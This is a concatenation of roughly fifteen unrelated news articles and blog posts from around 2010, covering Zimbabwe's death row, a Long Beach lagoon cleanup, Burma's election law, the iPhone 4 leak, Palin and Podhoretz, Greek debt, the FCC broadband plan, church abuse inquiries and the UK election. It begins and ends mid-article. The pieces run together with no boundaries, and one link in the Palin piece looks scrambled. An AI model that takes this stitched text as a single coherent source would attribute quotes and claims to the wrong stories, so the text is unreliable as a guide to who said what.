He said : " Among us are George Manyonga who has spent 13 years awaiting execution , James Dube and Bright Gwashinga who have spent 10 and five years respectively , awaiting execution .
" This has caused severe trauma on the inmates that some of them are losing their mind ...
Worse still , to think that I can spend 13 years before execution , like my colleague George Manyonga , crushes me . "
Chikurubi prison is notorious for its filthy , freezing and overcrowded cells infested by maggots and rats .
Former inmates include Simon Mann , a British mercenary , whose lawyer claimed he was tortured , assaulted and endured lice , inedible food and general deprivation there in 2004 .
About 70 people are believed to have been executed since Zimbabwe gained independence in 1980 .
The country is under pressure to abolish the death penalty from human rights groups , such as Amnesty International .
Last week , an editorial in the state - owned Herald newspaper suggested it is time to reconsider the issue .
In the meantime , there seems little hope of persuading the last executioner , believed to be of Malawian origin , out of retirement .
The Daily News 's prison source said that he was a reluctant hangman , always extremely remorseful about his job .
Eleven storm drains empty into Colorado Lagoon in Long Beach , and its only outlet to the sea -- a 900 - foot underground culvert -- is choked with mussels , clams , sand and barnacles .
So it ’s no surprise that one of Southern California ’s only lagoons -- shallow saltwater bodies sheltered from the ocean -- is among the dirtiest around .
Last year , Colorado Lagoon was ranked as the state ’s fourth most - polluted beach in Heal the Bay ’s “ Beach Bummers ” list .
FOR THE RECORD :
Lagoon restoration : A story in Monday ’s Section A about the restoration of Colorado Lagoon in Long Beach misidentified the State Water Resources Control Board as the State Resources Control Board . —
Yet the Y - shaped basin is one of the most popular swimming spots in the city , packed with sunbathers and swimmers on hot summer afternoons .
Conservationists have been working for more than a decade to restore the 18 - acre lagoon , often removing as much as 100 pounds of trash at weekly cleanups .
But only now are their aspirations starting to take shape in a big way .
On March 1 , the city will begin the first phase of a $ 15 - million restoration project that will catch trash before it reaches the lagoon , remove contaminated sediment and revegetate its banks , and it could soon carve out an open channel to the sea to restore cleansing tidal flows .
“ Everyone that lives around here knows the lagoon is in really bad shape , and a lot of people have written it off and said it ’s too dirty to fix , ” said Dave Pirazzi , president of the nonprofit community group Friends of Colorado Lagoon .
“ We ’re trying to turn that around . ”
Once part of the Los Cerritos Wetlands , Colorado Lagoon was dredged in the 1920s along with other low - lying tidelands in Alamitos Bay for recreational rowing .
Divers leaped from a three - story floating platform to compete in trials for the 1932 Olympic Games in Los Angeles
But over the decades , the ecological health of the lagoon has deteriorated .
Today , the lagoon ’s water has elevated bacterial levels , and its sediment is contaminated with lead and other metals .
Mercury , DDT and other toxins have infested the fish and mussels that call it home .
In 2002 , the state designated the lagoon an “ impaired water body ” as trash , debris and sediment from a vast watershed continued to drain into the lagoon , the area ’s low - point .
The beach on the lagoon ’s southern edge is often closed because of sewage spills , most recently on Jan. 12 , when 876 gallons of waste from a clogged sewer made its way into the lagoon .
Long Beach public health officials , who take weekly water samples at the lagoon to monitor bacteria levels , say the measurements only intermittently spike to unsafe levels .
But there is no doubt that urban runoff and inadequate circulation have fouled the water .
“ People love the Colorado Lagoon ; it ’s something that ’s near and dear to the hearts of a lot of people that live there and have swam there , ” said Nelson Kerr , manager of the city ’s bureau of environmental health .
“ So we ’re looking with a lot of anticipation at this project .
It ’s very promising . ”
The project is being paid for with federal stimulus funds doled out by the State Resources Control Board .
The Port of Long Beach also advanced $ 1.3 million toward the restoration and paid for environmental and engineering studies .
If the entire restoration is completed , the port stands to receive credits from state regulators that could offset future expansion .
Some other improvements could help speed along the lagoon ’s recovery .
The city is building a new drain on nearby Termino Avenue , designed to route some runoff to the ocean instead of depositing it directly in the lagoon .
And three of the lagoon ’s other storm drains will be diverted to surrounding sewers .
The restoration project is kindling hopes that cleaner times will come to this urban sanctuary , ringed by houses and apartments and used by wildlife , swimmers and model boat enthusiasts .
“ The lagoon is kind of an underdog wetland , ” said Eric Zahn , restoration director for Friends of Colorado Lagoon .
“ But what I ’ve learned is that it ’s a rare place .
Where else can you swim with a great blue heron ? ”
tony.barboza@latimes.com
Ms Suu Kyi is expected to be still in detention during any elections Burma has issued a law which will bar pro-democracy leader Aung San Suu Kyi from taking part in planned elections and could force her party to expel her .
The new law prohibits anyone with a criminal conviction from belonging to a political party .
Ms Suu Kyi has been detained on various charges for most of the past 20 years , after winning the last polls in 1990 .
She was already excluded from political office by a constitutional bar on people with foreign spouses .
The Political Parties Registration Law was published in official newspapers as part of a series of daily announcements of laws intended to guide the elections .
The deputy chairman of Ms Suu Kyi's National League for Democracy ( NLD ) said the laws were " too much " .
" This is politically motivated toward Daw Aung San Suu Kyi , " Tin Oo told reporters .
No date has yet been set for polls , which the military has promised to hold this year .
Stark choice
The latest law orders any party to reject people who are " not in conformity with the qualification to be members of a party " .
It also bans members of religious orders and civil servants from joining political parties .
Buddhist monks were the driving forces behind anti-junta protests in 2007 .
Nyan
Win said the NLD had not yet decided how to respond to the laws
The BBC's South East Asia correspondent , Rachel Harvey , says Ms Suu Kyi was already prevented from running for office because of her marriage to a British man , but it now seems she will be prevented from leading her own party or playing any role in election campaigning .
NLD spokesman Nyan Win said he was " extremely surprised " by the extent of the restrictions in the long - awaited legislation .
" I did not think it would be so bad , " he told the AFP news agency .
Our correspondent says the NLD now faces a stark choice : expel its own leader in order to participate in the elections or opt out and forgo any further influence on the process .
She says the rules of the game are becoming clear .
The question now is who will be willing to play .
Nyan Win said the NLD needed to " reply clearly " to the new regulations but had not yet decided how to respond .
" What I can say now is the law is meant to safeguard the constitution .
It will be a very big problem for us as they asked us to obey a constitution that we cannot accept , " he said .
Political parties have 60 days from Monday , when the law was promulgated , to register with an election committee .
A law made public on Monday made it clear that the commission members would be appointed by the junta .
Credence doubt
The rules barring Ms Suu Kyi appear to fly in the face of recent calls by the US , European Union and Association of South East Asian Nations for the elections to be " inclusive " .
Critics say the laws aim to cement Gen Than Shwe 's military regime The United States has reiterated its scepticism that any poll in which opposition figures are barred will have any credibility .
" We urge the authorities to begin a genuine political dialogue with all stakeholders as a first step towards credible elections , " state department spokesman Philip Crowley told reporters .
" We are concerned by the Burmese authorities ' unilateral decision to begin releasing the election laws without first engaging in substantive dialogue with the democratic opposition or ethnic minority leaders , " he said .
" We remain sceptical that the elections planned for this year will be credible , " he added .
Regional and international human rights organisations have documented continued harassment , persecution and detention of government critics .
The regime enacted five election - related laws on Monday , two of which have now been made public .
Three more are to be unveiled in coming days .
Critics say the elections , the first to be held in Burma for 20 years , will be a sham designed to entrench the military 's grip on power .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Buying a new car is certainly going to be exciting but it is connected to some stress .
Which is the best model ?
Should [ Read More ]
A controlled leak ?
The lost iPhone planted by Apple ?
You have no idea how Apple PR works — and how , like it or not , Gizmodo finally beat them at their own game .
Advertisement
The only way the iPhone 4 was a controlled leak is if Apple has completely upended its PR strategy , which is the envy of the entire business world .
The only way it could even work , presuming it were true , would be the destruction of a decade of meticulously laid plans .
It would be cashing in all the marketing chips for no clear gain ;
Does anyone really think the iPhone 4 would n't have been a huge story on its own in June ?
The Lives of Other Journalists
For the better part of a decade , Apple has been the most secretive consumer company in the world .
In an age of blogging vice - presidents and corporate Twitter accounts , Apple communicates with all the garrulousness of a defense contractor .
Advertisement
Ask journalists who have dealt with Apple PR and they 'll tell you the same story : Apple is the most annoying company to work with in the business .
At best , they 're finicky , imposing ridiculous demands for simple requests like borrowing test products ; at worst — and most commonly — they just wo n't respond to requests .
Once you 've got the ear of Apple , they 're great .
Human , considerate , and helpful .
But make a mistake or step on their toes and they shut off your drip .
That 's their system — and it works brilliantly .
If you want access to Apple , you can't upset them .
And since nothing gets attention like Apple products , it behooves those in the tech enthusiast press to stay in Apple 's good graces .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
( It bears mentioning that Apple also will remove advertising from outlets that it is unhappy with , as they did with Gizmodo ever since we reported on Steve Jobs ' health problems .
Fortunately in organizations with a clear wall between edit and advertising — not perfect at Gawker , but as good or better as any other outlet I 've ever worked for — it is n't a concern for the writing staff . )
Advertisement
Access Journalism Is n't
The very reason this works for Apple is their legendary secrecy .
By keeping their communication channels completely closed , they have leverage over those to whom they give access .
I certainly do n't think it 's enough leverage to guarantee a positive review of a product but it 's impossible to argue that " access journalism " has anything but a deleterious effect on the objectivity of journalists .
Advertisement
Journalists will often freak out if you point this out because you are implying they are ethically or psychologically compromised .
Tough shit .
As someone who also gets sneak previews from gadget companies and free gear to test , even if temporarily , I have to cop to it , too .
We do our best not to let it influence us , but to deny there is any influence at all is disingenuous .
Access journalism does n't automatically corrupt the coverage , but it 's certainly not free from poison , either .
Advertisement
So why would Apple trade this power away by leaking a prototype phone to Gizmodo ?
Why would it take a decade of careful grooming of the media and throw it away ?
And what advantage would it serve ?
I can't conceive of a single advantage that would come to Apple that is n't an inherent benefit of the system they already have — or had — in place .
Leak as Distraction
There had been some that questioned why we ran our story on the same day the HTC Incredible reviews hit the stream .
Here 's why : Because it was a Monday .
Good news day .
If you really think Apple cares so much about mucking with the release of yet another Android phone that they 'd screw up an iPhone launch you 've got a out - of - kilter conception of Apple 's fear of Google .
Advertisement
The iPhone is Apple 's core product .
It 's their baby .
Why would they leak it to a relatively niche site like Gizmodo ?
( The best argument for this is simply that of all the tech sites out there , Gizmodo , part of the Gawker tabloid empire , would be the most likely to actually run the story . )
Follow the Money
What business advantage would leaking early give Apple ?
It disinclines customers from buying new iPhones or perhaps even new iPads .
I know I 'm considering selling my iPad now that I know the next model will surely have a front - facing videocamera .
Advertisement
There is some suspicion that Apple has fed stories to media outlets in the past , like when the Wall Street Journal floated the story about the iPad 's cost being " at about $ 1,000 " .
( No one I 've ever spoken to at WSJ has ever confirmed that to be true , but they do n't tell me much . )
That made some sense , as it set the stage for the real price , which seemed " surprisingly " low .
Sacrificing Gray Powell
While the outing of Apple engineer Gray Powell was inevitable — his name was going to come out anyway , and there is a real if slight chance that foisting him into the public eye might help him keep his job at Apple — I think the way we did it was incredibly tacky .
I 've said my piece to my co-workers , but I bring it up here because it 's important for another reason .
Advertisement
Do you really think Apple would hang one of its engineers out to dry like this ?
Gray Powell is a real person — hell , he 's just a kid — who will now spend the rest of his life or at least the foreseeable future of his career living down one of the biggest gaffes in tech history .
Apple may be cruel , but I do n't think they 're that evil .
Why It 's Important This Was n't a Leak
As far as I can see it , the only antidote to access journalism is to be as ruthless in controlling the story as Apple and other technology companies attempt to be .
There 's no need to drape this in the flags of journalism and freedom — it 's not Watergate — but it 's as close as you 're going to get in the enthusiast press .
Advertisement
If you think that Gizmodo should n't have shown you the iPhone before Apple wanted you to see it , you 're accepting that Apple should be the one to control news about its products .
That 's not an irrational position , but let 's be honest about what it means .
You can't accuse Gizmodo and the tech press of only being shills for companies then pillory us when we break the cycle .
Presuming this was a leak is limp thinking .
Worse , it hands back the control of the story to Apple because some are more comfortable believing Apple 's machinations are infallible than that they 're a company made up of human beings who try to control the news cycle — and that even the best laid plan can fall apart because of a single human mistake .
The Wall Street Journal is an international newspaper , published in New York , with Asian and European editions .
It has the largest circulation of any newspaper in America , with a readership of 2.1 million .
http://nytimes.com/2009/10/27/vuainwaa/mwsi/27/AUDIT.HTML.
Studies have shown that while the Journal seems to have a liberal bias in its reporting of news , the editorial portion of the paper has a history of featuring conservative points of view .
( Groseclose and Milyo , A Measure of Media Bias ) .
On March 29 , 2010 , the Wall Street Journal published the opinion of Norman Podhoretz ; entitled In Defense of Sarah Palin http://online.wsj.com/article/SB10001424052748703909804575123773804984924.html
Before considering the merits of the article , which are sorely lacking , let ’s first consider Norman Podhoretz .
Mr. Podhoretz is a senior citizen .
At 80 years old , he is already older than John McCain .
I have nothing against senior citizens , but many have been known to be out of step with modern thought .
However , forget his age ; let ’s consider some of the positions taken by Podhoretz in the past .
He favors “ tough interrogation ” techniques , such as those used by the Bush administration , and defends the actions of soldiers at Abu Ghraib .
http://www.youtube.com/watch?v=TiphADB5aSI
He believes waging war against Iraq was a good thing .
http://www.youtube.com/watch?v=_am6gVBSJb0
Even more frightening is his current position that the United States should bomb Iran .
http://www.opinionjournal.com/federation/feature/?id=110010139;
http://www.youtube.com/watch?v=2bLq6pzOc5w
Some have even suggested that Norman Podhoretz hates America .
“ Why Does Norman Podhoretz Hate America ? ”
http://www.antiwar.com/scheuer/?articleid=11670
Given the controversial nature of Podhoretz , why would the Wall Street Journal publish his editorial ?
Why would Podhoretz defend Sarah Palin ?
Perhaps the real reason Podhoretz defends Palin is that they share the same vision for the future of Iran .
http://www.danielpipes.org/7940/sarah-palin-endorses-bomb-iran.
Podhoretz is clever enough to justify his defense of Palin by comparing her to Ronald Reagan .
http://online.wsj.com/article/SB10001424052748703909804575123773804984924.html.
It seems that Podhoretz has fallen victim to Palin ’s efforts to characterize herself as the next Ronald Reagan .
In her Tea Party speech , Palin made reference to Reagan at least five different times , as if we did n’t get her point the first , second , third , or fourth time .
http://www.youtube.com/watch?v=iP4PJlufZ0c
However most of America is educated enough to understand that there are major differences between Ronald Reagan and Sarah Palin .
http://www.youtube.com/watch?v=iP4PJlufZ0c
Palin is nothing like Ronald Reagan .
Reagan served as Governor of California , America ’s most populous state , with approximately 36 million people .
Palin was Governor of Alaska which is the 47th least populated state , having less than one million people .
Reagan served two full terms as Governor of California , and Palin did n’t complete one .
Reagan attended Eureka College for four years , where he received a degree in social sciences and economics .
Sarah attended five different schools , and received a four - year degree in broadcast journalism , in five short years .
While in college Reagan lettered in football , swimming , and track .
Sarah played basketball in high school , and although she takes credit for “ winning a state championship ” , the reality is that she scored a total of 6 points in the three games that led to the state championship ( Benet , “ Trailblazer ” ) .
While in college Reagan served two years on the student senate , and was the president of the student body his senior year .
If Palin ever held any office in high school or college , I am unaware of it , and I have done a lot of research on Palin .
Reagan was an active member of a fraternity , the president of the boosters club , and held a job throughout college in the dining hall .
As far as I can tell Sarah never attended a single college long enough to pledge a sorority , or to hold down a job , and she never belonged to any club long enough to be elected as its leader .
I am old enough to remember Ronald Reagan giving speeches to the American people , and I ca n’t recall a time that he ever had to consult his hand as a reminder of the points he needed to cover , and he did n’t have a major in broadcast journalism .
I also ca n’t remember a time that he ever wore black leather when giving a speech .
Perhaps there is one commonality Reagan and Palin share .
In the biography of Reagan , it was made known that Ronald Reagan practiced a morality that was very different from what he preached .
http://www.pbs.org/wgbh/amex/presidents/40_reagan/tguide/index.html
Reagan got his first wife pregnant out of wedlock , http://www.nytimes.com/1991/04/07/us/all-that-glitters-is-not-real-book-on-nancy-reagan-says.html?pagewanted=2 and Palin was pregnant before she married Todd .
http://sarahpalinexposed.com/?p=522
In spite of these similarities , even Ronald Reagan ’s own son says that Reagan would not have supported Palin .
http://crooksandliars.com/david-neiwert/pam-geller-tries-tell-ron-reagan-jr
Obviously , Podhoretz was sucked in by Sarah ’s feminine characteristics , and little else .
Maybe Podhoretz was overwhelmed by her all - American face and form , as John McCain was .
People , who wrote letters to the editor of the Wall Street Journal , were not so easily persuaded .
Matt O’Brien of Austin Texas , explained “ … this does n’t mean that we should ignore or condone Ms. Palin ’s manifest incompetence and anti-intellectual populism . ”
Ari Weitzner of New York expressed his feelings that : “ Even non-elitists had to wince when Ms. Palin refused to answer Katie Couric ’s simple question regarding which newspapers she reads . ”
Frederic Wile of New York described Palin as “ … disastrously under informed . ” Vaughn Carney of Stow , Vt. , contrasted Palin with Reagan by pointing out that Palin “ … walked out on the people of Alaska to chase money and celebrity . ”
( Wall Street Journal , pg. A18 , April 5 , 2010 )
It ’s time for Mr. Podhoretz to retire , or at least time for the Wall Street Journal to refuse to give Mr. Podhoretz the attention of 2.6 million readers .
Our country deserves better from the Wall Street Journal and from its editors .
Another glaring example of how broken the Greek funding market is , is the record negative basis spread in Greek 5 Year Cash - CDS , which as of today is almost - 200 bps ( see below ) .
As a reminder , the basis trade 's massive inversion in the days after the Lehman collapse is among the primary reasons for the implosion of Merrill , and the spectacular blow up of Deutsche 's prop trading desk .
What the primary implication of this observation is that the market is essentially saying that the imminent Greek bankruptcy will likely be in the form of a voluntary restructuring , which will not trigger CDS , although that is not the full story .
The risk / return scenario , as Credit Trader points out , is assuming a 200 bps upside to bond spreads , or a 400 bps downside to an inline level with the rest of Europe , in essence a 33 % chance of a free fall bankruptcy , whose implication would most likely be the collapse of the Eurozone , as the EMU would be defunct if a member country escalates into an uncontrollable bankruptcy .
h/t Credit Trader
We 've known some of the major details about the FCC 's sweeping National Broadband Plan — namely 100 M bps broadband in 100 million homes — for a while now , but today they 've made it official .
It 's a sweeping proposal , with six main long - term goals :
Almost a year after the FCC first announced their National Broadband Plan , some new details have …
Goal No. 1 : At least 100 million US homes should have affordable access to actual download speeds of at least 100 megabits per second and actual upload speeds of at least 50 megabits per second .
Goal No. 2 : The United States should lead the world in mobile innovation , with the fastest and most extensive wireless networks of any nation .
Goal No. 3 : Every American should have an affordable access to robust broadband service , and the means and skills to subscribe if they so choose .
Goal No. 4 : Every American community should have affordable access to at least 1 gigabit per second broadband service to anchor institutions such as schools , hospitals and government buildings .
Goal No. 5 : To ensure the safety of the American people , every first responder should have access to a nationwide , wireless , interoperable broadband public safety network .
Goal No. 6 : To ensure that America leads in the clean energy economy , every American should be able to use broadband to track and manage their real - time energy consumption .
The crisis gripping the Catholic church deepened today , with calls for national inquiries to be held in Germany and Ireland to fully disclose the detail and extent of sexual abuse by priests .
With hundreds of allegations surfacing in Europe since the start of the year , the German chancellor , Angela Merkel , said the scandal of abuse in the country 's churches and schools posed a " major challenge " that could be resolved only through a full and frank inquiry into all cases .
In Ireland , which has already seen far - reaching investigations into the abuse , the Archbishop of Dublin said a national inquiry into historic claims may be the only way to fully restore confidence in the church .
The most senior Catholic in the country , Cardinal Sean Brady , resisted intense pressure to resign over his part in helping cover up the scandal .
The scale of the abuse – with additional allegations of clerical scandals emerging in Switzerland , Austria and Brazil – has caused as much alarm in some quarters as has the church 's response .
Merkel 's intervention revealed the level of concern in Germany .
Addressing the Bundestag in her first public statement on the subject , she called the sexual abuse of children a " despicable crime " .
She added : " The only way for our society to come to terms with it is to look for the truth and find out everything that has happened . "
She warned , however , that " the damage suffered by the victims can never fully be repaired " .
Her remarks , the most outspoken to have come from a head of government on the issue , came on the eve of a pastoral letter from the pope .
It will be published on Friday and addressed to the " Irish faithful " and he referred to it in his general audience at the Vatican yesterday .
Speaking in English , he said : " In recent months the church in Ireland has been severely shaken as a result of the child abuse crisis .
" As a sign of my deep concern I have written a pastoral letter dealing with this painful situation .
I ask all of you to read it for yourselves , with an open heart and in a spirit of faith . "
The Catholic church in Ireland has been the subject of devastating criticism in two reports detailing collusion , cruelty and endemic abuse throughout its institutions .
Last weekend , in a further blow to its reputation , Cardinal Brady admitted attending meetings where two 10 - year - olds were forced to sign vows of silence over complaints against Father Brendan Smyth , who continued abusing children for a further 18 years .
The cardinal used his St Patrick 's Day sermon to apologise for his role in the cover - up of child abuse by Father Smyth , one of the country 's most notorious paedophile priests .
Although the pope has taken an active interest in Irish church affairs – summoning its bishops to an emergency meeting – his letter may not be enough for victims and their families .
Repeated demands for openness and honesty appear to have trickled through to the Vatican .
Monsignor Charles Scicluna , the Vatican official responsible for handling abuse allegations , told the New York Times yesterday : " We have to get our act together and start working for more transparency in investigations and more adequate responses for the problem . "
A new approach was necessary at " every level of the church " , he added .
LONDON ( Reuters ) - British Prime Minister Gordon Brown was set to announce on Tuesday a May 6 parliamentary election which could bring down the curtain on 13 years of rule by his center - left Labor Party .
Britain's Prime Minister Gordon Brown is driven away after giving evidence to the Iraq Inquiry at the Queen Elizabeth II conference centre in London March 5 , 2010 .
REUTERS / Andrew Winning
Brown will meet Queen Elizabeth on Tuesday to request a dissolution of parliament , a Labor party source said , a formality which will mark the start of a month - long campaign for one of the most unpredictable elections in Britain for almost two decades .
The opposition Conservatives lead Labor in opinion polls but the gap has been narrowing .
An ICM poll in Tuesday ’s Guardian newspaper showed Labor only four points behind the Conservatives and on course to remain the largest party , albeit without an overall majority .
[ nUKPOLLS10 ] .
Support for the Conservatives is unevenly distributed in Britain ’s 650 parliamentary constituencies , meaning Labor can win the most seats even if it does not capture the largest share of the vote nationally .
An inconclusive election result is rare in Britain and is the nightmare scenario for financial markets , which want a clear outcome and the promise of meaningful action to tackle a budget deficit running at almost 12 percent of GDP .
Failure by either of the main parties to win a majority could hand a pivotal role to the smaller opposition Liberal Democrats , who will be trying to maintain a bloc of around 60 MPs in parliament .
ECONOMY TAKES Center STAGE
How best to run an economy slowly emerging from the worst recession since World War Two is likely to be the central theme in the campaign , entwined with issues such as how best to manage public services in straitened times .
Labor argues that Brown has steered Britain through turbulent economic times and to hand over now to an inexperienced opposition would jeopardize recovery .
“ The people of this country have fought too hard to get Britain on the road to recovery to allow anybody to take us back on the road to recession , ” Brown said in a statement previewing his campaign themes .
The Conservatives , led by former public relations executive David Cameron , have long said they would cut the deficit harder and faster than Labor but have now promised to exempt most workers from a rise in payroll tax that Labor plans from 2011 .
That has won applause from the party ’s traditional business supporters but Labor has cried foul , saying the Conservatives ’ plans do not add up .
“ We ’re fighting this election for the Great Ignored .
Young , old , rich , poor , black , white , gay , straight , ” Cameron said in a statement , showing how he has tried to make his party more inclusive .
The outgoing parliament , which has served a full five years , has been tarnished by a scandal over lawmakers ’ expenses that angered Britons .
As many as 150 members of parliament are stepping down , many with reputations harmed by the scandal .
All three main parties have suffered and some analysts expect fringe parties and independent candidates to pick up extra votes at the polls .
Adding spice to the campaign will be an innovation in British politics -- live television debates between Prime Minister Brown , Conservative leader Cameron and Liberal Democrat Nick Clegg .
Iquitos , Peru ( CNN ) -- Nearly 21 years ago , Patty Webster landed her dream job as an adventure tour guide in the Peruvian Amazon .
But as she shared the area 's beauty and culture with tourists , she realized there was a darker side to the rainforest paradise .
" I saw how poor they were and realized that people were dying because they did n't have medical care , " Webster said .
She started sharing her supplies with the locals and soon began waking up to find people waiting outside her mosquito net to ask her for medicine .
At one point , Webster -- who had no medical training -- gave someone stitches , following instructions from a book .
" It was kind of scary , " she recalled .
" If they 're depending on me for their health care ... we 're all going to die . "
That 's when she decided to stay and do something more .
Since 1993 , Webster has been bringing medical relief to some of Peru 's poorest and most remote areas through her nonprofit , now known as Amazon Promise .
Webster -- described by a visiting doctor as " sort of a cross between Indiana Jones and Mother Teresa and Susan Sarandon " -- and her volunteers have provided free health care and education to more than 55,000 people .
Do you know a hero ?
Nominations are open for 2010 CNN Heroes
It 's hardly the life one could have predicted for this Detroit , Michigan , native , but she 's never followed an " ordinary " path .
The daughter of postal workers , Webster headed to New York after high school graduation and worked as a model , a Radio City usherette and an ASPCA adoption counselor before going to Peru for a wildlife internship .
When she was offered a job as an adventure tour guide , she jumped at the chance and has never looked back .
Today , she runs Amazon Promise from Iquitos , considered the most populous city in the world that can't be reached by road .
It 's in the northeastern corner of the country , in the middle of the rainforest , and is the capital of Peru 's largest and most remote region .
Nearly half of the area 's population lives in poverty , and one - third of residents lack access to basic medical care , according to Peru's National Institute for Statistics and Information Technology .
Some might go their entire lives without seeing a doctor .
That 's what Webster is working to change .
She organizes several expeditions to these underserved areas every year .
Each trip is staffed by adventure - seeking medical volunteers from the West -- often from U.S. medical schools -- and Peruvian health professionals .
A traditional shaman , or healer , frequently accompanies them .
Dr. John Glick met Webster while on a trip to the slums of Belen , near Iquitos , for the Gesundheit !
Institute , Dr. Patch Adams ' health organization .
" She 's an amazing person .
She is sort of a cross between Indiana Jones and Mother Teresa and Susan Sarandon , " Glick said .
" She is a unique and focused individual who is serving the health needs of some of the ( poorest ) people in the world . "
Financed largely by the volunteers ' trip fees , Webster 's teams travel around the region for up to four weeks at a time , holding free clinics for the local people .
Getting to these remote areas is Webster 's biggest challenge .
Many of the villages take days to reach , often requiring travel by bus , helicopter and boat .
Large portions of these trips are made on the area 's winding rivers -- no easy feat when traveling with 30 to 40 containers of medical supplies .
" Sometimes we 're in dugout canoes ... and we 'll encounter major rapids , " Webster explained .
" When that happens , you just need to get in and close your eyes . "
In the villages , the volunteers provide preventive services such as prenatal checkups and general exams , but most of their time is spent treating a wide range of ailments like malaria , TB , pneumonia , diarrhea , animal or snake bites , and parasites .
Teams usually see several hundred patients during each expedition .
Webster also strives to empower the local population by training village health workers and educating villagers about HIV prevention , hygiene and sanitation .
The group also works in some of the region 's most destitute urban areas .
" We often see people that are even sicker right in the city than in the jungle , " she said .
Webster hopes to build a permanent clinic in Belen , a slum on the outskirts of Iquitos .
She envisions providing services to the city 's poor , training for health workers and housing for villagers who come to the city for treatment .
The government has donated land for the project , and Webster is working to raise the funds for construction .
In the meantime , the group has built a simple structure where it will hold clinics twice a month .
After 17 years ,
Webster still has yet to collect a salary for her work , and she lives in the group 's offices in Iquitos .
But while life on a shoestring budget is n't always easy , knowing that she 's having an impact keeps her motivated .
" Regardless of whether it 's getting to one person or 30 people or 300 people , you make a big difference , " she said .
" Anything I can offer them that is going to help them ... it 's just a real gift . "
It 's a gift she plans to keep giving for as long as she can .
" I 've found my purpose , " she said .
" It certainly was n't what I had planned for my life , but you can't go against these forces of nature . "
Want to get involved ?
Check out the Amazon Promise Web site and see how to help .
Fundraiser Lets You Ride The Rails On The CTA
By Kevin Robinson in Arts & Entertainment on Mar 16 , 2010 4:40 PM
Photo by Phototravel1 host a fundraiser Sunday , March 28 , with a chartered ride on nearly every rail line of the CTA , as well as " non-revenue " lines and rail yards , on a four car train of 2200 - series cars built by Budd , the oldest CTA cars in service .
( Just like riding the Blue Line to work ! )
Those cars are scheduled for retirement , to be replaced by 5000 - series cars .
The event , which costs $ 42 a ticket , will raise funds to pay for indoor storage of the IRM 's cream - and - green 2000 series L cars from the 1960s .
The trip departs at 9 a.m. from the Rosemont Blue Line station , and will run about nine hours .
According to the IRM , " riders may also board at Rosemont southbound at approximately 9:20 am , Jefferson Park station ( 4917 N. Milwaukee Ave. ) at approximately 9:35 am , or Clark / Lake station ( 124 W. Lake Street ) at approximately 10:05 am ; to board train at these alternate Blue Line stations , hold up ticket in plain view of motorman and excursion crew . "
Tickets are $ 42 , and can be purchased through the Illinois Rail Museum website .
The Obama administration should be seriously considering a strike on Iran , according to neoconservative Fox News contributor Bill Kristol .
An Israeli Deputy Defense Minister said last week that he expected Israel would have to attack Iran within a year .
Kristol believes it would be better for the US to attack first .
“ I think we have to have a credible threat of force and the preparation to use force against Iran .
It would be much better if we used force against — to delay the Iranian nuclear program than if Israel did and there is no evidence that the US government is being at all serious about the use force there , ” Kristol told Fox News ’ Chris Wallace Sunday .
ADVERTISEMENT
Nina Easton , also appearing on the Fox News Sunday panel , quickly rebuked Kristol .
“ Use of force .
You say that so blithely as if use of force — what happens to next day after the use of force ? ” she asked .
“ I think it behooves us to get the international community together .
You have to have sanctions and you have to have a clear threat of force . ”
The narrow range of debate on Fox News varied only slightly from sanctions and threatening force to launching a US - led war on Iran .
Easton said she would also like to see the Obama administration “ curry dissent ” in Iran .
Kristol ’s trigger - finger was too itchy to keep his views in the holster .
“ Look , precisely because the consequences are so serious whether we use force or Israel uses force , a serious and responsible US government must think that through and play that out , ” he responded .
“ I would say the Obama administration is so adverse to even hinting at the use of force that we do n’t have the kinds of preparations we should have if Israel were to strike . ”
This video is from Fox ’s Fox News Sunday , broadcast April 4 , 2010 .
ADVERTISEMENT
Download video via RawReplay.com
Local , state and federal political figures told a crowd at the Colorado Cannabis Convention on Saturday that they believe marijuana laws nationwide will continue to become less restrictive , with full legalization a real possibility .
But , the politicians said , marijuana activists will need to be both patient and persistent to make that happen .
“ Do n’t expect the legislature to solve all of these problems in one year , ” said state Sen .
Pat Steadman , D - Denver .
“ Do n’t expect every piece of legislation to be perfect .
The law usually moves in baby steps over time . ”
The legislative panel — featuring Steadman ; state Rep. Joe Miklosi , D - Denver ; Denver Councilman Chris Nevitt ; and the district director for U.S. Rep. Jared Polis , D - Colo . — was one of the main events of the convention ’s final day .
( Another was a better - attended autograph - signing session by the marijuana - infused hip - hop group Cypress Hill . )
Organizers had predicted the convention could attract as many as 100,000 people ; attendance was steady Saturday , but no official head count was available .
Event organizer Michael Lerner , a California media magnate whose properties include Kush magazine and DailyBuds.com , said he was pleased with the event .
“ Phenomenal , ” he said .
“ Completely incident - free . ”
Polis had been expected to speak at the legislative panel but had to cancel at the last minute .
Nonetheless , Polis district director Andy Schultheiss told the crowd that Polis is supportive of marijuana activists and said the congressman from Boulder has signed on as a co-sponsor to a bill that would give full protection from federal prosecution to the medical - marijuana industry and another that would legalize marijuana altogether for adults .
Polis also is a co-sponsor on a bill that would allow defendants in medical - marijuana states to raise a medical defense in federal court .
The bills have not yet had a congressional hearing .
“ The number of members of Congress who say , like Jared Polis , that marijuana should be legalized is growing , ” Schultheiss said . “. . .
Social change takes time , and we are in the middle of it now . ”
None of the panel members differed greatly in their opinions , and they spoke to an audience of the converted .
When Miklosi said of medical - marijuana , “ This can be a positive force in society , ” the comment drew cheers .
Earlier in the day , a panel of lawyers was less optimistic about the immediate political future of marijuana .
Attorney Rob Corry said efforts at the state Capitol to craft rules for the medical - marijuana industry amounted to an attempt to “ regulate us out of existence . ”
Brian Vicente , with Sensible Colorado , said the bills would hurt small marijuana growers and patient cooperatives .
And attorney Sean McAllister urged medical - marijuana growers and caregivers to refuse to cooperate with police investigations .
“ Say , ‘ It ’s medical , it ’s legal and other than that you can talk to my attorney , ’ ” McAllister said .
John Ingold : 303-954-1068 or jingold@denverpost.com
It is marketing that should drive web site design .
We have an excellent approach to all of our web services products which emphasizes marketing and technical excellence .
Successful web sites need to be found first , which means using sophisticated techniques to appeal to the search engines .
They must also be visually appealing and have the content to hold the attention of their visitors and help them make the right choice .
E - commerce sites also need technical sophistication to provide robust , secure , and fail - safe systems to deliver products to the client - every time .
The warden of a federal prison in San Bernardino County was indicted Wednesday on charges of disclosing confidential information about a pending criminal investigation and then lying to investigators about having done so , authorities said .
